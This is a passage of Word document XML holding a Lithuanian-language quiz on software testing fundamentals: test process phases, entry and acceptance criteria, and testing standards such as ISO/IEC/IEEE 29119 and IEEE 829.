    <w:p w:rsidR="009D6E00" w:rsidRDefault="00862C6D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Parodyti, kad programinė įranga neturi klaidų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C22E38" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pademonstruoti, kad programinė įranga veik</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>ia</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> taip, kaip turi veikti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D507FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rasti kiek įmanoma daugiau defektų programinėje įrangoje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D507FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pademonstruoti, kad programinė įranga neatlie</w:t>
      </w:r>
      <w:r w:rsidR="009847C7" w:rsidRPr="00AD4464">
        <w:t>ka funkcijų, kurias turi atlikti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003D27EB" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuris iš žemiau pateiktų teiginių geriausiai apibūdina testavimą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003D27EB" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tai veikla, kuri yra planuojama kaip atsira</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>s fazė</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> PĮ kūrimo cikle, iškart po to, kai PĮ programavimas yra baigtas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003D27EB" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tai veikla, kuri yra PĮ kūrimo proceso dalis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003D27EB" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tai veikla, </w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>kuri yra kokybė</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>s užtikrinimo proceso dalis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003D27EB" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tai formalus procesas</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>kurį taiko tik nepriklausomos testavimo komandos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0001674F" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="003A47AB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">DARBAS PAGAL STANDARTINĮ </w:t>
      </w:r>
      <w:r w:rsidR="0032209D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTAVIMO PROCESĄ</w:t>
      </w:r>
      <w:r w:rsidR="00C3696A">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F84D3B" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Atsakykite į žemiau pateiktus klausimus. Kiekvie</w:t>
      </w:r>
      <w:r w:rsidR="00C34B97" w:rsidRPr="00AD4464">
        <w:t>nas klausimas gali turėti vieną</w:t>
      </w:r>
      <w:r w:rsidR="004A773C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> arba daugiau teisingų atsakymų</w:t>
      </w:r>
      <w:r w:rsidR="00C3696A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004A773C" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="001758A6" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: Susipažinti su tarptautiniais standartais planavimui, reikalavimų analizei, testavimo veikloms. Suprasti pagrindines testavime naudojamas sąvokas ir skirtumus tarp jų. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuri iš nuro</w:t>
      </w:r>
      <w:r w:rsidR="004E1340" w:rsidRPr="00AD4464">
        <w:t>dytų veiklų grupių testavim</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>o procese yra pirma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Testavimo </w:t>
      </w:r>
      <w:r w:rsidR="00306420" w:rsidRPr="00AD4464">
        <w:t>analizė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo planavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo kontrolė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo vykdymas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Į ką atsižvelgiame planuodami testavimo veiklas</w:t>
      </w:r>
      <w:r w:rsidR="001758A6" w:rsidRPr="00AD4464">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Į sistemą, kuria testuosime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Į testavimo atvejus ir reikalavimus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Į duomenų surinkimą, testavimo aplinkas ir ataskaitas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B13819" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Į testavimo apimtis, biudžetą ir rizikas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00363CC0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kurią testavimo veiklą vykdyti per vėlu testavimo užbaigimo fazėje?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00363CC0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sukurti testavimo apibendrinimo ataskaitą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00363CC0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Įsitikinti, kad visi defektai yra išspręsti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00363CC0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vykdyti likusius testavimo atvejus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00363CC0" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Archyvuoti t</w:t>
      </w:r>
      <w:r w:rsidR="00306420" w:rsidRPr="00AD4464">
        <w:t>estavimo aplinkas, dokumentaciją, testuojamą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> sistemą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001758A6" w:rsidRPr="00AD4464" w:rsidRDefault="00375F4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Surašykite pagrindinės testavimo proceso veiklų grupes eilės tvarka: </w:t>
      </w:r>
      <w:r w:rsidR="00306420" w:rsidRPr="00AD4464">
        <w:t>testavimo veiklų užbaigimas; testavimo analizė; t</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>estavimo planavimas</w:t>
      </w:r>
      <w:r w:rsidR="00365BD4" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> ir kontro</w:t>
      </w:r>
      <w:r w:rsidR="00365BD4" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>lė</w:t>
      </w:r>
      <w:r w:rsidR="00306420" w:rsidRPr="00AD4464">
        <w:t>; testavimo vykdymas; t</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">estavimo veiklų stebėjimas ir </w:t>
      </w:r>
      <w:r w:rsidR="00365BD4" w:rsidRPr="00AD4464">
        <w:t>ataskaitų teikimas</w:t>
      </w:r>
      <w:r w:rsidR="00306420" w:rsidRPr="00AD4464">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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00375F4A" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00306420" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>1.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00306420" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>2.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00306420" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>3.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00306420" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>4.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00375F4A" w:rsidRPr="00AD4464" w:rsidRDefault="00306420" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:lastRenderedPageBreak/>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0082561F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuris iš žemiau pateiktų standartų apibrėžia testavimo dokumentacijos reikalavimus?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0082561F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ISO</w:t>
      </w:r>
      <w:r w:rsidR="00E76023" w:rsidRPr="00AD4464">
        <w:t>/IEC 12207</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E76023" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ISO/</w:t>
      </w:r>
      <w:r w:rsidR="0082561F" w:rsidRPr="00AD4464">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>EC/IEEE 29119</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E76023" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>IEEE 829</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B14E01" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ISO/IEC/IEEE 15288</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00582159" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuris i</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">š pateiktų teiginių NĖRA </w:t>
      </w:r>
      <w:r w:rsidR="00AE1C2D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>testavimo pradžios kriterijus?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE1C2D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo aplinkos yra paruoštos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE1C2D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo planas yra patvirtintas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE1C2D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo rezultatai yra tenkinami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F974AE" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Testavimo komanda </w:t>
      </w:r>
      <w:r w:rsidR="00AE1C2D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> yra apmokyta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00925B2C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kurie iš pateiktų teiginių yra priėmimo kriterijai?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00925B2C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Visi kritiniai defektai yra ištaisyti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00925B2C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Visi testavimo</w:t>
      </w:r>
      <w:r w:rsidR="00F974AE" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> atvejai yra į</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>vykdyti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00925B2C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimui naudoti duomenys yra suarchyvuoti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00925B2C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">95% </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įvykdytų testavimo atvejų yra ivykdyti sėkmingai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F974AE" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuria</w:t>
      </w:r>
      <w:r w:rsidR="00D01C7B" w:rsidRPr="00AD4464">
        <w:t>s iš paveiks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
